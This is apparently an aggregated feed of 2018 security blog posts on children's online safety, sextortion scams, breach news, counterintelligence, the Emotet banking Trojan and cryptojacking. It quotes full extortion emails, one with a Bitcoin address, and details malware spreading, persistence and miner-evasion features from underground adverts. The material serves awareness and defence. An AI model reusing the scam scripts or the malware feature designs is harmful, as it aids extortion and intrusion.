It dawned on me that, while daughter has managed to puzzle out how to route around geofencing issues that many adults can’t grasp, her safety online is never something to take for granted. I have encountered parents that allow their kids to access the Internet without controls beyond “don’t do X” — which we all know is as effective as holding up gauze in front of semi and hoping for the best (hat tip to Robin Williams).

More parents need to be made aware that on the tubes of the Internet, “here be dragons.”

First and foremost for keeping your kids safe online is that you need to wrap your head around a poignant fact. iThingers and their ilk are NOT babysitters. Please get this clear in your mind. Yes, I have been known to use these as child suppression devices for long car rides but, we need to be honest with ourselves. Far too often they become surrogates and this needs to stop. When I was kid my folks would plonk me down in front of the massive black and white television with faux wood finish so I could watch one of the three channels. Too a large extent this became the forerunner of the modern digital iBabysitter.

These days I can’t walk into a restaurant without seeing some family engrossed in their respective devices oblivious of the world around them, let alone each other. Set boundaries for usage. Do not let these devices be a substitute parent or a distraction and be sure to regulate what is being done online for both you and your child.

I have had conversations about what is the best software to install on a system to monitor a child’s activity with many parents. Often that is a conversation borne out of fear of the unknown. Non-technical parents outnumber the technically savvy ones by an order of magnitude and we can’t forget this fact. There are numerous choices out there that you can install on your computer but, the software package that is frequently overlooked is common sense.

All kidding aside, there seems to a precondition in modern society to offload and outsource responsibility. Kids are curious and they will click links and talk to folks online without the understanding that there are bad actors out there. It is incumbent upon us, the adults, to address that situation through education. Talk with your kids so that they understand what the issues are that they need to be aware of when they’re online. More importantly, if you as a parent aren’t aware of the dangers that are online you need to avail yourself of the information.

This is where programs such as the ISC2’s “Safe and Secure Online” come in.

Protecting your children is your top priority and helping children protect themselves online is ours. The (ISC)² Safe and Secure Online (SSO) program brings cyber security experts into classrooms and to community groups like scouts or sports clubs at no charge to teach children ages 7-10 and 11-14 how to stay safe online. We also offer a parent presentation so that you may learn these vital tools as well.

This is by no means that only choice out there but, it is a good starting point. The Internet is a marvelous collection of information but, as with anything that is the product of a hive mind, there is a dark side. Parents and kids need to take the time to arm themselves with the education to help guard against perils of the online world.

If you don’t know, ask. If you don’t ask, you’ll never know.

Originally posted on CSO Online by me.

The post “Here Be Dragons”, Keeping Kids Safe Online appeared first on Liquidmatrix Security Digest.

Scammers Use Breached Personal Details to Persuade Victims

Scammers use a variety of social engineering tactics when persuading victims to follow the desired course of action. One example of this approach involves including in the fraudulent message personal details about the recipient to “prove” that the victim is in the miscreant’s grip. In reality, the sender probably obtained the data from one of the many breaches that provide swindlers with an almost unlimited supply of personal information.

Personalized Porn Extortion Scam

Consider the case of an extortion scam in which the sender claims to have evidence of the victim’s pornography-viewing habits. The scammer demands payment in exchange for suppressing the “compromising evidence.” A variation of this technique was documented by Stu Sjouwerman at KnowBe4 in 2017. In a modern twist, the scammer includes personal details about the recipient—beyond merely the person’s name—such as the password the victim used:

“****** is one of your password and now I will directly come to the point. You do not know anything about me but I know alot about you and you must be thinking why are you getting this e mail, correct?

I actually setup malware on porn video clips (adult porn) & guess what, you visited same adult website to experience fun (you get my drift). And when you got busy enjoying those videos, your web browser started out operating as a RDP (Remote Desktop Protocol) that has a backdoor which provided me with accessibility to your screen and your web camera controls.”

The email includes demand for payment via cryptocurrency such Bitcoin to ensure that “Your naughty secret remains your secret.” The sender calls this “privacy fees.” Variations on this scheme are documented in the Blackmail Email Scam thread on Reddit.

The inclusion of the password that the victim used at some point in the past lends credibility to the sender’s claim that the scammer knows a lot about the recipient. In reality, the miscreant likely obtained the password from one of many data dumps that include email addresses, passwords, and other personal information stolen from breached websites.

Data Breach Lawsuit Scam

In another scenario, the scammer uses the knowledge of the victim’s phone number to “prove” possession of sensitive data. The sender poses as an entity that’s preparing to sue the company that allegedly leaked the data:

“Your data is compromised. We are preparing a lawsuit against the company that allowed a big data leak. If you want to join and find out what data was lost, please contact us via this email. If all our clients win a case, we plan to get a large amount of compensation and all the data and photos that were stolen from the company. We have all information to win. For example, we write to your email and include part your number ****** from a large leak.”

The miscreant’s likely objective is to solicit additional personal information from the victim under the guise of preparing the lawsuit, possibly requesting the social security number, banking account details, etc. The sender might have obtained the victim’s name, email address and phone number from a breached data dump, and is phishing for other, more lucrative data.

What to Do?

If you receive a message that solicits payment or confidential data under the guise of knowing some of your personal information, be skeptical. This is probably a mass-mailed scam and your best approach is usually to ignore the message. In addition, keep an eye on the breaches that might have compromised your data using the free and trusted service Have I Been Pwned by Troy Hunt, change your passwords when this site tells you they’ve been breached, and don’t reuse passwords across websites or apps.

Sometimes an extortion note is real and warrants a closer look and potentially law enforcement involvement. Only you know your situation and can decide on the best course of action. Fortunately, every example that I’ve had a chance to examine turned out to be social engineering trick that recipients were best to ignore.

To better under understand persuasion tactics employed by online scammers, take a look at my earlier articles on this topic:


Free SANS Webinar: I Before R Except After IOC

Join Andrew Hay on Wednesday, July 25th, 2018 at 10:30 AM EDT (14:30:00 UTC) for an exciting free SANS Institute Webinar entitled “I” Before “R” Except After IOC. Using actual investigations and research, this session will help attendees better understand the true value of an individual IOC, how to quantify and utilize your collected indicators, and what constitutes an actual incident.

Just because the security industry touts indicators of compromise (IOCs) as much needed intelligence in the war on attackers, the fact is that not every IOC is valuable enough to trigger an incident response (IR) activity. All too often our provided indicators contain information of varying quality including expired attribution, dubious origin, and incomplete details. So how many IOCs are needed before you can confidently declare an incident? After this session, the attendee will:

  • Know how to quickly determine the value of an IOC,
  • Understand when more information is needed (and from what source), and
  • Make intelligent decisions on whether or not an incident should be declared.

Register to attend the webinar here:

Cyber Security Roundup for July 2018

The importance of assuring the security and testing quality of third-party provided applications is more than evident when you consider an NHS reported data breach of 150,000 patient records this month. The NHS said the breach was caused by a coding error in a GP application called SystmOne, developed by UK based 'The Phoenix Partnership' (TTP). The same assurances also applies to internally developed applications, case-in-point was a publically announced flaw with Thomas Cook's booking system discovered by a Norwegian security researcher. The research used to app flaw to access the names and flights details of Thomas Cook passengers and release details on his blog. Thomas Cook said the issue has since been fixed.

Third-Third party services also need to be security assured, as seen with the Typeform compromise. Typeform is a data collection company, on 27th June, hackers gained unauthorised access to one of its servers and accessed customer data. According to their official notification, Typeform said the hackers may have accessed the data held on a partial backup, and that they had fixed a security vulnerability to prevent reoccurrence. Typeform has not provided any details of the number of records compromised, but one of their customers, Monzo, said on its official blog that is was in the region of 20,000. Interestingly Monzo also declared ending their relationship with Typeform unless it wins their trust back. Travelodge one UK company known to be impacted by the Typeform breach and has warned its impacted customers. Typeform is used to manage Travelodge’s customer surveys and competitions.

Other companies known to be impacted by the Typeform breach include:

The Information Commissioner's Office (ICO) fined Facebook £500,000, the maximum possible, over the Cambridge Analytica data breach scandal, which impacted some 87 million Facebook users. Fortunately for Facebook, the breach occurred before the General Data Protection Regulation came into force in May, as the new GDPR empowers the ICO with much tougher financial penalties design to bring tech giants to book, let's be honest, £500k is petty cash for the social media giant.
Facebook-Cambridge Analytica data scandal
Facebook reveals its data-sharing VIPs
Cambridge Analytica boss spars with MPs

A UK government report criticised the security of Huawei products, concluded the government had "only limited assurance" Huawei kit posed no threat toUK national security. I remember being concerned many years ago when I heard BT had ditched US Cisco routers for Huawei routers to save money, not much was said about the national security aspect at the time. The UK gov report was written by the Huawei Cyber Security Evaluation Centre (HCSEC), which was set up in 2010 in response to concerns that BT and other UK companies reliance on the Chinese manufacturer's devices, by the way, that body is overseen by GCHQ.

Banking hacking group "MoneyTaker" has struck again, this time stealing a reported £700,000 from a Russia bank according to Group-IB. The group is thought to be behind several other hacking raids against UK, US, and Russian companies. The gang compromise a router which gave them access to the bank's internal network, from that entry point, they were able to find the specific system used to authorise cash transfers and then set up the bogus transfers to cash out £700K.


Porn Extortion Email tied to Password Breach

(An update to this post has been made at the end)

This weekend I received an email forwarded from a stranger.  They had received a threatening email and had shared it with a former student of mine to ask advice.  Fortunately, the correct advice in this case was "Ignore it."  But they still shared it with me in case we could use it to help others.

The email claims that the sender has planted malware on the recipient's computer and has observed them watching pornography online.   As evidence that they really have control of the computer, the email begins by sharing one of the recipient's former passwords.

They then threaten that they are going to release a video of the recipient recorded from their webcam while they watched the pornography unless they receive $1000 in Bitcoin.  The good news, as my former student knew, was that this was almost certainly an empty threat.   There have dozens of variations on this scheme, but it is based on the concept that if someone knows your password, they COULD know much more about you.  In this case, the password came from a data breach involving a gaming site where the recipient used to hang out online.  So, if you think to yourself "This must be real, they know my password!" just remember that there have been  HUNDREDS of data breaches where email addresses and their corresponding passwords have been leaked.  (The website "Have I Been Pwned?" has collected over 500 Million such email/password pair leaks.  In full disclosure, my personal email is in their database TEN times and my work email is in their database SIX times, which doesn't concern me because I follow the proper password practice of using different passwords on every site I visit.  Sites including Adobe, which asks for you to register before downloading software, and LinkedIn are among some of the giants who have had breaches that revealed passwords.  One list circulating on the dark web has 1.4 BILLION userids and passwords gathered from at least 250 distinct data breaches.)

Knowing that context, even if you happen to be one of those millions of Americans who have watched porn online.  DON'T PANIC!  This email is definitely a fake, using their knowledge of a breached password to try to convince you they have blackmail information about you.

We'll go ahead and share the exact text of the email, replacing only the password with the word YOURPASSWORDHERE.

YOURPASSWORDHERE is one of your passphrase. Lets get directly to the point. There is no one who has paid me to investigate you. You don't know me and you are most likely wondering why you are getting this mail?
In fact, I actually installed a malware on the X video clips (porn) web site and do you know what, you visited this site to experience fun (you know what I mean). When you were watching video clips, your browser initiated functioning as a RDP that has a key logger which provided me accessibility to your display screen and also cam. after that, my software obtained your entire contacts from your Messenger, Facebook, and email . After that I made a double-screen video. 1st part shows the video you were viewing (you've got a nice taste omg), and next part shows the view of your web cam, & its you. 
You have got not one but two alternatives. We will go through these choices in details:
First alternative is to neglect this email message. In such a case, I will send out your very own videotape to all of your contacts and also visualize about the embarrassment you will definitely get. And definitely if you happen to be in a romantic relationship, exactly how this will affect?
Latter solution is to compensate me $1000. Let us describe it as a donation. In such a case, I will asap delete your video. You can go forward your daily life like this never occurred and you surely will never hear back again from me.
You'll make the payment through Bitcoin (if you do not know this, search for "how to buy bitcoin" in Google). 
BTC Address: 192hBrF64LcTQUkQRmRAVgLRC5SQRCWshi[CASE sensitive so copy and paste it]
If you are thinking about going to the law, well, this email can not be traced back to me. I have taken care of my moves. I am not attempting to charge a fee a huge amount, I simply want to be rewarded. You have one day in order to pay. I have a specific pixel in this e-mail, and now I know that you have read through this mail. If I do not receive the BitCoins, I will definately send your video to all of your contacts including family members, co-workers, and so forth. Having said that, if I receive the payment, I'll destroy the video right away. If you really want proof, reply with Yes & I definitely will send out your video recording to your 5 friends. This is the non-negotiable offer and thus don't waste mine time & yours by responding to this message.
This particular scam was first seen in the wild back in December of 2017, though some similar versions predate it.  However, beginning in late May the scam kicked up in prevalence, and in the second week of July, apparently someone's botnet started sending this spam in SERIOUS volumes, as there have been more than a dozen news stories just in the past ten days about the scam.

Here's one such warning article from the Better Business Bureau's Scam Tracker.

One thing to mention is that the Bitcoin address means that we can track whether payments have been made to the criminal.  It seems that this particular botnet is using a very large number of unique bitcoin addresses.  It would be extremely helpful to this investigation if you could share in the comments section what Bitcoin address (the "BTC Address") was seen in your copy of the spam email.

As always, we encourage any victim of a cyber crime to report it to the FBI's Internet Crime and Complaint Center by visiting

Please feel free to share this note with your friends!
Thank you!


The excellent analysts at the SANS Internet Storm Center have also been gathering bitcoin addresses from victims.  In their sample so far, 17% of the Bitcoins have received payments totalling $235,000, so people truly are falling victim to this scam!

Please continue to share this post and encourage people to add their Bitcoin addresses as a comment below!

Defining Counterintelligence

I've written about counterintelligence (CI) before, but I realized today that some of my writing, and the writing of others, may be confused as to exactly what CI means.

The authoritative place to find an American definition for CI is the United States National Counterintelligence and Security Center. I am more familiar with the old name of this organization, the  Office of the National Counterintelligence Executive (ONCIX).

The 2016 National Counterintelligence Strategy cites Executive Order 12333 (as amended) for its definition of CI:

Counterintelligence – Information gathered and activities conducted to identify, deceive,
exploit, disrupt, or protect against espionage, other intelligence activities, sabotage, or assassinations conducted for or on behalf of foreign powers, organizations, or persons, or their agents, or international terrorist organizations or activities. (emphasis added)

The strict interpretation of this definition is countering foreign nation state intelligence activities, such as those conducted by China's Ministry of State Security (MSS), the Foreign Intelligence Service of the Russian Federation (SVR RF), Iran's Ministry of Intelligence, or the military intelligence services of those countries and others.

In other words, counterintelligence is countering foreign intelligence. The focus is on the party doing the bad things, and less on what the bad thing is.

The definition, however, is loose enough to encompass others; "organizations," "persons," and "international terrorist organizations" are in scope, according to the definition. This is just about everyone, although criminals are explicitly not mentioned.

The definition is also slightly unbounded by moving beyond "espionage, or other intelligence activities," to include "sabotage, or assassinations." In those cases, the assumptions is that foreign intelligence agencies and their proxies are the parties likely to be conducting sabotage or assassinations. In the course of their CI work, paying attention to foreign intelligence agents, the CI team may encounter plans for activities beyond collection.

The bottom line for this post is a cautionary message. It's not appropriate to call all intelligence activities "counterintelligence." It's more appropriate to call countering adversary intelligence activities counterintelligence.

You may use similar or the same approaches as counterintelligence agents when performing your cyber threat intelligence function. For example, you may recruit a source inside a carding forum, or you may plant your own source in a carding forum. This is similar to turning a foreign intelligence agent, or inserting your own agent in a foreign intelligence service. However, activities directing against a carding forum are not counterintelligence. Activities directing against a foreign intelligence service are counterintelligence.

The nature and target of your intelligence activities are what determine if it is counterintelligence, not necessarily the methods you use. Again, this is in keeping with the stricter definition, and not becoming a victim of scope creep.

TA18-201A: Emotet Malware

Original release date: July 20, 2018

Systems Affected

Network Systems


Emotet is an advanced, modular banking Trojan that primarily functions as a downloader or dropper of other banking Trojans. Emotet continues to be among the most costly and destructive malware affecting state, local, tribal, and territorial (SLTT) governments, and the private and public sectors.

This joint Technical Alert (TA) is the result of Multi-State Information Sharing & Analysis Center (MS-ISAC) analytic efforts, in coordination with the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC).


Emotet continues to be among the most costly and destructive malware affecting SLTT governments. Its worm-like features result in rapidly spreading network-wide infection, which are difficult to combat. Emotet infections have cost SLTT governments up to $1 million per incident to remediate.

Emotet is an advanced, modular banking Trojan that primarily functions as a downloader or dropper of other banking Trojans. Additionally, Emotet is a polymorphic banking Trojan that can evade typical signature-based detection. It has several methods for maintaining persistence, including auto-start registry keys and services. It uses modular Dynamic Link Libraries (DLLs) to continuously evolve and update its capabilities. Furthermore, Emotet is Virtual Machine-aware and can generate false indicators if run in a virtual environment.

Emotet is disseminated through malspam (emails containing malicious attachments or links) that uses branding familiar to the recipient; it has even been spread using the MS-ISAC name. As of July 2018, the most recent campaigns imitate PayPal receipts, shipping notifications, or “past-due” invoices purportedly from MS-ISAC. Initial infection occurs when a user opens or clicks the malicious download link, PDF, or macro-enabled Microsoft Word document included in the malspam. Once downloaded, Emotet establishes persistence and attempts to propagate the local networks through incorporated spreader modules.

Figure 1: Malicious email distributing Emotet

Currently, Emotet uses five known spreader modules: NetPass.exe, WebBrowserPassView, Mail PassView, Outlook scraper, and a credential enumerator.

  1. NetPass.exe is a legitimate utility developed by NirSoft that recovers all network passwords stored on a system for the current logged-on user. This tool can also recover passwords stored in the credentials file of external drives.
  2. Outlook scraper is a tool that scrapes names and email addresses from the victim’s Outlook accounts and uses that information to send out additional phishing emails from the compromised accounts.
  3. WebBrowserPassView is a password recovery tool that captures passwords stored by Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera and passes them to the credential enumerator module.
  4. Mail PassView is a password recovery tool that reveals passwords and account details for various email clients such as Microsoft Outlook, Windows Mail, Mozilla Thunderbird, Hotmail, Yahoo! Mail, and Gmail and passes them to the credential enumerator module.
  5. Credential enumerator is a self-extracting RAR file containing two components: a bypass component and a service component. The bypass component is used for the enumeration of network resources and either finds writable share drives using Server Message Block (SMB) or tries to brute force user accounts, including the administrator account. Once an available system is found, Emotet writes the service component on the system, which writes Emotet onto the disk. Emotet’s access to SMB can result in the infection of entire domains (servers and clients).
Figure 2: Emotet infection process

To maintain persistence, Emotet injects code into explorer.exe and other running processes. It can also collect sensitive information, including system name, location, and operating system version, and connects to a remote command and control server (C2), usually through a generated 16-letter domain name that ends in “.eu.” Once Emotet establishes a connection with the C2, it reports a new infection, receives configuration data, downloads and runs files, receives instructions, and uploads data to the C2 server.

Emotet artifacts are typically found in arbitrary paths located off of the AppData\Local and AppData\Roaming directories. The artifacts usually mimic the names of known executables. Persistence is typically maintained through Scheduled Tasks or via registry keys. Additionally, Emotet creates randomly-named files in the system root directories that are run as Windows services. When executed, these services attempt to propagate the malware to adjacent systems via accessible administrative shares.

Note: it is essential that privileged accounts are not used to log in to compromised systems during remediation as this may accelerate the spread of the malware.

Example Filenames and Paths:

C:\Users\<username>\AppData \Local\Microsoft\Windows\shedaudio.exe

C:\Users\<username>\AppData\Roaming\Macromedia\Flash Player\macromedia\bin\flashplayer.exe

Typical Registry Keys:




System Root Directories:






Negative consequences of Emotet infection include

  • temporary or permanent loss of sensitive or proprietary information,
  • disruption to regular operations,
  • financial losses incurred to restore systems and files, and
  • potential harm to an organization’s reputation.


NCCIC and MS-ISAC recommend that organizations adhere to the following general best practices to limit the effect of Emotet and similar malspam:

  • Use Group Policy Object to set a Windows Firewall rule to restrict inbound SMB communication between client systems. If using an alternative host-based intrusion prevention system (HIPS), consider implementing custom modifications for the control of client-to-client SMB communication. At a minimum, create a Group Policy Object that restricts inbound SMB connections to clients originating from clients.
  • Use antivirus programs, with automatic updates of signatures and software, on clients and servers.
  • Apply appropriate patches and updates immediately (after appropriate testing).
  • Implement filters at the email gateway to filter out emails with known malspam indicators, such as known malicious subject lines, and block suspicious IP addresses at the firewall.
  • If your organization does not have a policy regarding suspicious emails, consider creating one and specifying that all suspicious emails should be reported to the security or IT department.
  • Mark external emails with a banner denoting it is from an external source. This will assist users in detecting spoofed emails.
  • Provide employees training on social engineering and phishing. Urge employees not to open suspicious emails, click links contained in such emails, or post sensitive information online, and to never provide usernames, passwords, or personal information in answer to any unsolicited request. Educate users to hover over a link with their mouse to verify the destination prior to clicking on the link.
  • Consider blocking file attachments that are commonly associated with malware, such as .dll and .exe, and attachments that cannot be scanned by antivirus software, such as .zip files.
  • Adhere to the principal of least privilege, ensuring that users have the minimum level of access required to accomplish their duties. Limit administrative credentials to designated administrators.
  • Implement Domain-Based Message Authentication, Reporting & Conformance (DMARC), a validation system that minimizes spam emails by detecting email spoofing using Domain Name System (DNS) records and digital signatures.

If a user or organization believes they may be infected, NCCIC and MS-ISAC recommend running an antivirus scan on the system and taking action to isolate the infected workstation based on the results. If multiple workstations are infected, the following actions are recommended:

  • Identify, shutdown, and take the infected machines off the network;
  • Consider temporarily taking the network offline to perform identification, prevent reinfections, and stop the spread of the malware;
  • Do not log in to infected systems using domain or shared local administrator accounts;
  • Reimage the infected machine(s);
  • After reviewing systems for Emotet indicators, move clean systems to a containment virtual local area network that is segregated from the infected network;
  • Issue password resets for both domain and local credentials;
  • Because Emotet scrapes additional credentials, consider password resets for other applications that may have had stored credentials on the compromised machine(s);
  • Identify the infection source (patient zero); and
  • Review the log files and the Outlook mailbox rules associated with the infected user account to ensure further compromises have not occurred. It is possible that the Outlook account may now have rules to auto-forward all emails to an external email address, which could result in a data breach.


MS-ISAC is the focal point for cyber threat prevention, protection, response, and recovery for the nation’s SLTT governments. More information about this topic, as well as 24/7 cybersecurity assistance for SLTT governments, is available by phone at 866-787-4722, by email at, or on MS-ISAC’s website at

To report an intrusion and request resources for incident response or technical assistance, contact NCCIC by email at or by phone at 888-282-0870.


Revision History

  • July, 20 2018: Initial version

This product is provided subject to this Notification and this Privacy & Use policy.

How the Rise of Cryptocurrencies Is Shaping the Cyber Crime Landscape: The Growth of Miners


Cyber criminals tend to favor cryptocurrencies because they provide a certain level of anonymity and can be easily monetized. This interest has increased in recent years, stemming far beyond the desire to simply use cryptocurrencies as a method of payment for illicit tools and services. Many actors have also attempted to capitalize on the growing popularity of cryptocurrencies, and subsequent rising price, by conducting various operations aimed at them. These operations include malicious cryptocurrency mining (also referred to as cryptojacking), the collection of cryptocurrency wallet credentials, extortion activity, and the targeting of cryptocurrency exchanges.

This blog post discusses the various trends that we have been observing related to cryptojacking activity, including cryptojacking modules being added to popular malware families, an increase in drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, cryptojacking as a threat to critical infrastructure, and observed distribution mechanisms.

What Is Mining?

As transactions occur on a blockchain, those transactions must be validated and propagated across the network. As computers connected to the blockchain network (aka nodes) validate and propagate the transactions across the network, the miners include those transactions into "blocks" so that they can be added onto the chain. Each block is cryptographically hashed, and must include the hash of the previous block, thus forming the "chain" in blockchain. In order for miners to compute the complex hashing of each valid block, they must use a machine's computational resources. The more blocks that are mined, the more resource-intensive solving the hash becomes. To overcome this, and accelerate the mining process, many miners will join collections of computers called "pools" that work together to calculate the block hashes. The more computational resources a pool harnesses, the greater the pool's chance of mining a new block. When a new block is mined, the pool's participants are rewarded with coins. Figure 1 illustrates the roles miners play in the blockchain network.

Figure 1: The role of miners

Underground Interest

FireEye iSIGHT Intelligence has identified eCrime actor interest in cryptocurrency mining-related topics dating back to at least 2009 within underground communities. Keywords that yielded significant volumes include miner, cryptonight, stratum, xmrig, and cpuminer. While searches for certain keywords fail to provide context, the frequency of these cryptocurrency mining-related keywords shows a sharp increase in conversations beginning in 2017 (Figure 2). It is probable that at least a subset of actors prefer cryptojacking over other types of financially motivated operations due to the perception that it does not attract as much attention from law enforcement.

Figure 2: Underground keyword mentions

Monero Is King

The majority of recent cryptojacking operations have overwhelmingly focused on mining Monero, an open-source cryptocurrency based on the CryptoNote protocol, as a fork of Bytecoin. Unlike many cryptocurrencies, Monero uses a unique technology called "ring signatures," which shuffles users' public keys to eliminate the possibility of identifying a particular user, ensuring it is untraceable. Monero also employs a protocol that generates multiple, unique single-use addresses that can only be associated with the payment recipient and are unfeasible to be revealed through blockchain analysis, ensuring that Monero transactions are unable to be linked while also being cryptographically secure.

The Monero blockchain also uses what's called a "memory-hard" hashing algorithm called CryptoNight and, unlike Bitcoin's SHA-256 algorithm, it deters application-specific integrated circuit (ASIC) chip mining. This feature is critical to the Monero developers and allows for CPU mining to remain feasible and profitable. Due to these inherent privacy-focused features and CPU-mining profitability, Monero has become an attractive option for cyber criminals.

Underground Advertisements for Miners

Because most miner utilities are small, open-sourced tools, many criminals rely on crypters. Crypters are tools that employ encryption, obfuscation, and code manipulation techniques to keep their tools and malware fully undetectable (FUD). Table 1 highlights some of the most commonly repurposed Monero miner utilities.

XMR Mining Utilities











Table 1: Commonly used Monero miner utilities

The following are sample advertisements for miner utilities commonly observed in underground forums and markets. Advertisements typically range from stand-alone miner utilities to those bundled with other functions, such as credential harvesters, remote administration tool (RAT) behavior, USB spreaders, and distributed denial-of-service (DDoS) capabilities.

Sample Advertisement #1 (Smart Miner + Builder)

In early April 2018, actor "Mon£y" was observed by FireEye iSIGHT Intelligence selling a Monero miner for $80 USD – payable via Bitcoin, Bitcoin Cash, Ether, Litecoin, or Monero – that included unlimited builds, free automatic updates, and 24/7 support. The tool, dubbed Monero Madness (Figure 3), featured a setting called Madness Mode that configures the miner to only run when the infected machine is idle for at least 60 seconds. This allows the miner to work at its full potential without running the risk of being identified by the user. According to the actor, Monero Madness also provides the following features:

  • Unlimited builds
  • Builder GUI (Figure 4)
  • Written in AutoIT (no dependencies)
  • FUD
  • Safer error handling
  • Uses most recent XMRig code
  • Customizable pool/port
  • Packed with UPX
  • Works on all Windows OS (32- and 64-bit)
  • Madness Mode option

Figure 3: Monero Madness

Figure 4: Monero Madness builder

Sample Advertisement #2 (Miner + Telegram Bot Builder)

In March 2018, FireEye iSIGHT Intelligence observed actor "kent9876" advertising a Monero cryptocurrency miner called Goldig Miner (Figure 5). The actor requested payment of $23 USD for either CPU or GPU build or $50 USD for both. Payments could be made with Bitcoin, Ether, Litecoin, Dash, or PayPal. The miner ostensibly offers the following features:

  • Written in C/C++
  • Build size is small (about 100–150 kB)
  • Hides miner process from popular task managers
  • Can run without Administrator privileges (user-mode)
  • Auto-update ability
  • All data encoded with 256-bit key
  • Access to Telegram bot-builder
  • Lifetime support (24/7) via Telegram

Figure 5: Goldig Miner advertisement

Sample Advertisement #3 (Miner + Credential Stealer)

In March 2018, FireEye iSIGHT Intelligence observed actor "TH3FR3D" offering a tool dubbed Felix (Figure 6) that combines a cryptocurrency miner and credential stealer. The actor requested payment of $50 USD payable via Bitcoin or Ether. According to the advertisement, the Felix tool boasted the following features:

  • Written in C# (Version
  • Browser stealer for all major browsers (cookies, saved passwords, auto-fill)
  • Monero miner (uses pool by default, but can be configured)
  • Filezilla stealer
  • Desktop file grabber (.txt and more)
  • Can download and execute files
  • Update ability
  • USB spreader functionality
  • PHP web panel

Figure 6: Felix HTTP

Sample Advertisement #4 (Miner + RAT)

In January 2018, FireEye iSIGHT Intelligence observed actor "ups" selling a miner for any Cryptonight-based cryptocurrency (e.g., Monero and Dashcoin) for either Linux or Windows operating systems. In addition to being a miner, the tool allegedly provides local privilege escalation through the CVE-2016-0099 exploit, can download and execute remote files, and receive commands. Buyers could purchase the Windows or Linux tool for €200 EUR, or €325 EUR for both the Linux and Windows builds, payable via Monero, bitcoin, ether, or dash. According to the actor, the tool offered the following:

Windows Build Specifics

  • Written in C++ (no dependencies)
  • Miner component based on XMRig
  • Easy cryptor and VPS hosting options
  • Web panel (Figure 7)
  • Uses TLS for secured communication
  • Download and execute
  • Auto-update ability
  • Cleanup routine
  • Receive remote commands
  • Perform privilege escalation
  • Features "game mode" (mining stops if user plays game)
  • Proxy feature (based on XMRig)
  • Support (for €20/month)
  • Kills other miners from list
  • Hidden from TaskManager
  • Configurable pool, coin, and wallet (via panel)
  • Can mine the following Cryptonight-based coins:
    • Monero
    • Bytecoin
    • Electroneum
    • DigitalNote
    • Karbowanec
    • Sumokoin
    • Fantomcoin
    • Dinastycoin
    • Dashcoin
    • LeviarCoin
    • BipCoin
    • QuazarCoin
    • Bitcedi

Linux Build Specifics

  • Issues running on Linux servers (higher performance on desktop OS)
  • Compatible with AMD64 processors on Ubuntu, Debian, Mint (support for CentOS later)

Figure 7: Miner bot web panel

Sample Advertisement #5 (Miner + USB Spreader + DDoS Tool)

In August 2017, actor "MeatyBanana" was observed by FireEye iSIGHT Intelligence selling a Monero miner utility that included the ability to download and execute files and perform DDoS attacks. The actor offered the software for $30 USD, payable via Bitcoin. Ostensibly, the tool works with CPUs only and offers the following features:

  • Configurable miner pool and port (default to minergate)
  • Compatible with both 64- and 86-bit Windows OS
  • Hides from the following popular task managers:
  • Windows Task Manager
  • Process Killer
  • KillProcess
  • System Explorer
  • Process Explorer
  • AnVir
  • Process Hacker
  • Masked as a system driver
  • Does not require administrator privileges
  • No dependencies
  • Registry persistence mechanism
  • Ability to perform "tasks" (download and execute files, navigate to a site, and perform DDoS)
  • USB spreader
  • Support after purchase

The Cost of Cryptojacking

The presence of mining software on a network can generate costs on three fronts as the miner surreptitiously allocates resources:

  1. Degradation in system performance
  2. Increased cost in electricity
  3. Potential exposure of security holes

Cryptojacking targets computer processing power, which can lead to high CPU load and degraded performance. In extreme cases, CPU overload may even cause the operating system to crash. Infected machines may also attempt to infect neighboring machines and therefore generate large amounts of traffic that can overload victims' computer networks.

In the case of operational technology (OT) networks, the consequences could be severe. Supervisory control and data acquisition/industrial control systems (SCADA/ICS) environments predominately rely on decades-old hardware and low-bandwidth networks, therefore even a slight increase in CPU load or the network could leave industrial infrastructures unresponsive, impeding operators from interacting with the controlled process in real-time.

The electricity cost, measured in kilowatt hour (kWh), is dependent upon several factors: how often the malicious miner software is configured to run, how many threads it's configured to use while running, and the number of machines mining on the victim's network. The cost per kWh is also highly variable and depends on geolocation. For example, security researchers who ran Coinhive on a machine for 24 hours found that the electrical consumption was 1.212kWh. They estimated that this equated to electrical costs per month of $10.50 USD in the United States, $5.45 USD in Singapore, and $12.30 USD in Germany.

Cryptojacking can also highlight often overlooked security holes in a company's network. Organizations infected with cryptomining malware are also likely vulnerable to more severe exploits and attacks, ranging from ransomware to ICS-specific malware such as TRITON.

Cryptocurrency Miner Distribution Techniques

In order to maximize profits, cyber criminals widely disseminate their miners using various techniques such as incorporating cryptojacking modules into existing botnets, drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, and distributing cryptojacking utilities via spam and self-propagating utilities. Threat actors can use cryptojacking to affect numerous devices and secretly siphon their computing power. Some of the most commonly observed devices targeted by these cryptojacking schemes are:

  • User endpoint machines
  • Enterprise servers
  • Websites
  • Mobile devices
  • Industrial control systems
Cryptojacking in the Cloud

Private sector companies and governments alike are increasingly moving their data and applications to the cloud, and cyber threat groups have been moving with them. Recently, there have been various reports of actors conducting cryptocurrency mining operations specifically targeting cloud infrastructure. Cloud infrastructure is increasingly a target for cryptojacking operations because it offers actors an attack surface with large amounts of processing power in an environment where CPU usage and electricity costs are already expected to be high, thus allowing their operations to potentially go unnoticed. We assess with high confidence that threat actors will continue to target enterprise cloud networks in efforts to harness their collective computational resources for the foreseeable future.

The following are some real-world examples of cryptojacking in the cloud:

  • In February 2018, FireEye researchers published a blog detailing various techniques actors used in order to deliver malicious miner payloads (specifically to vulnerable Oracle servers) by abusing CVE-2017-10271. Refer to our blog post for more detailed information regarding the post-exploitation and pre-mining dissemination techniques used in those campaigns.
  • In March 2018, Bleeping Computer reported on the trend of cryptocurrency mining campaigns moving to the cloud via vulnerable Docker and Kubernetes applications, which are two software tools used by developers to help scale a company's cloud infrastructure. In most cases, successful attacks occur due to misconfigured applications and/or weak security controls and passwords.
  • In February 2018, Bleeping Computer also reported on hackers who breached Tesla's cloud servers to mine Monero. Attackers identified a Kubernetes console that was not password protected, allowing them to discover login credentials for the broader Tesla Amazon Web services (AWS) S3 cloud environment. Once the attackers gained access to the AWS environment via the harvested credentials, they effectively launched their cryptojacking operations.
  • Reports of cryptojacking activity due to misconfigured AWS S3 cloud storage buckets have also been observed, as was the case in the LA Times online compromise in February 2018. The presence of vulnerable AWS S3 buckets allows anyone on the internet to access and change hosted content, including the ability to inject mining scripts or other malicious software.
